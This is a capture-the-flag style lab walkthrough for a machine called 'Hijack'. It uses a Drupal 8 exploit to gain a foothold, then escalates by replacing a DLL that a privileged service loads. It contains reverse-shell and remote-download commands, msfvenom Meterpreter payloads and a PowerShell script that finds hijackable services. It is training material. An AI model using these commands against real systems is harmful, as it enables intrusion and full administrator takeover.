Premise

In this post we demonstrated basic exploitation of the Drupal content management system to gain a limited shell on the remote host. We then escalated our privileges by generating a custom DLL payload and replacing the DLL that a privileged service loads with it. The lab machine is called ‘Hijack’.

Machine Name: Hijack

Difficulty: Beginner

Skills Learned

  • Drupal
  • OWASP
  • DLL Hijacking

Finding the Way In

I started with an Nmap scan, which revealed a web server running Drupal 8. I checked robots.txt for interesting directories and then went to the main page. It had a login form, but rather than brute-force it I looked for a more elegant way in.

Drupal 8 has several publicly known remote code execution vulnerabilities, so I searched for an exploit and found a Bash script that looked promising. As written, the script only echoed a simple message into a file on the target as proof of execution; I modified it to download and execute a reverse shell payload from my machine instead.

After some trial and error with different payloads, I used the exploit to download Netcat to the target and then ran it to get a reverse shell. I now had a foothold on the machine, but only as an unprivileged user.

Becoming the Admin

My next goal was to become the administrator. I enumerated the services on the machine and found one called “hijack.” The name was a dead giveaway, so I looked at it more closely.

I checked the permissions on the service’s executable and found that I had no write access to it. I did, however, have write access to the “libraries” directory from which the service loads its DLLs. A service that runs as a privileged account and loads a DLL from a directory a low-privileged user can write to is the classic setup for a DLL hijacking attack: whatever code sits in that DLL runs with the service’s privileges the next time it is loaded.

I used msfvenom to create a DLL with a Meterpreter payload and named it custom.dll to match one of the legitimate DLLs in that directory. I then downloaded my DLL into the “libraries” directory over the original file. Keep a copy of the original first so it can be restored afterwards: a msfvenom DLL runs its payload from DllMain and exports none of the functions the original DLL did, so the payload fires as soon as the service loads the file, but the service itself will most likely fail right after.

All that was left was to start the “hijack” service. As soon as I did, the service loaded my DLL, which ran my payload and gave me a Meterpreter session with full administrator privileges! 👑 Two practical caveats: starting a service yourself requires the SERVICE_START right on it (visible in the service’s security descriptor via sc sdshow); without it the payload only runs the next time the service starts on its own, for example after a reboot. And because the session lives inside the service process, migrate to another process promptly, since the service manager may terminate a process whose service never reports that it started.
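As an added example (my own code, not the author’s or anything from the lab), here is a PowerShell script that automates the checks behind this escalation: which services run from a directory the current user can write to, what DLLs sit in it, which account the service runs as, and whether the service’s security descriptor plausibly lets the current user start it. The parameter names and the start-permission heuristic are my own; the “libraries” subdirectory default and the service name “hijack” in the usage line are taken from the post.

```powershell
# Added example, not part of the original post: enumerate Windows services
# whose executable directory (or a DLL subdirectory such as "libraries")
# is writable by the current low-privileged user, and report whether that
# user appears to be allowed to start the service. Run it in the foothold
# shell on the target. The -ServiceName and -LibDir parameters are my own;
# their defaults follow the post.
param(
    [string]$ServiceName = '*',
    [string]$LibDir      = 'libraries'
)

function Test-WritableDir {
    # ACL parsing is easy to get wrong (deny ACEs, nested groups), so
    # actually try to create and delete a probe file in the directory.
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    $probe = Join-Path $Path ([IO.Path]::GetRandomFileName())
    try {
        [IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

function Get-ServiceExePath {
    # Win32_Service.PathName may be quoted and may carry arguments;
    # return only the executable path (first ".exe" wins for unquoted paths).
    param([string]$PathName)
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }
    return $null
}

function Test-ServiceStartable {
    # Heuristic: look in the service's SDDL (sc.exe sdshow) for an allow ACE
    # that grants RP (SERVICE_START) or GA (generic all) to a broad group:
    # AU = Authenticated Users, BU = Users, WD = Everyone, IU = Interactive.
    # A real access check would resolve the caller's own group membership;
    # this only flags the common misconfigurations.
    param([string]$Name)
    $sddl = (& sc.exe sdshow $Name 2>$null) -join ''
    if (-not $sddl) { return $false }
    $broad = 'AU', 'BU', 'WD', 'IU'
    foreach ($ace in [regex]::Matches($sddl, '\(A;;([A-Z]+);;;([A-Z]+)\)')) {
        if ($broad -contains $ace.Groups[2].Value -and $ace.Groups[1].Value -match 'RP|GA') {
            return $true
        }
    }
    return $false
}

Get-CimInstance Win32_Service | Where-Object { $_.Name -like $ServiceName } | ForEach-Object {
    $svc = $_
    $exe = Get-ServiceExePath $svc.PathName
    if (-not $exe) { return }            # skip services with no usable path
    $dir  = Split-Path -Parent $exe
    $dirs = @($dir)
    $lib  = Join-Path $dir $LibDir
    if (Test-Path -LiteralPath $lib -PathType Container) { $dirs += $lib }

    foreach ($d in $dirs) {
        if (-not (Test-WritableDir $d)) { continue }
        $dlls = Get-ChildItem -LiteralPath $d -Filter *.dll -ErrorAction SilentlyContinue |
                Select-Object -ExpandProperty Name
        [pscustomobject]@{
            Service     = $svc.Name
            RunsAs      = $svc.StartName   # LocalSystem here means a SYSTEM shell after hijack
            State       = $svc.State
            StartMode   = $svc.StartMode
            WritableDir = $d
            DllsInDir   = ($dlls -join ', ')
            CanStart    = Test-ServiceStartable $svc.Name
        }
    }
}
```

Saved under a name of your choosing (say Find-DllHijack.ps1), `.\Find-DllHijack.ps1 -ServiceName hijack` prints one row per writable directory it finds; a row whose RunsAs is LocalSystem, whose DllsInDir lists the file you can overwrite, and whose CanStart is True is exactly the situation described above. The write test creates a real file, so run it only where that is acceptable.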

Commands I Used

Here are some of the key commands I used during this process:

  • Searching for exploits: searchsploit drupal 8
  • Generating a Meterpreter payload: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe -o win.exe
  • Starting a Python web server: python -m http.server
  • Downloading a file with certutil: certutil.exe -urlcache -f http://<IP>:<PORT>/nc64.exe nc64.exe
  • Setting up a Netcat listener: nc -lvp <PORT>
  • Getting a reverse shell with Netcat: nc64.exe -e cmd.exe <IP> <PORT>
  • Checking file permissions: icacls <DIRECTORY>
  • Generating a malicious DLL: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll -o custom.dll
  • Starting a service: sc start hijack

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.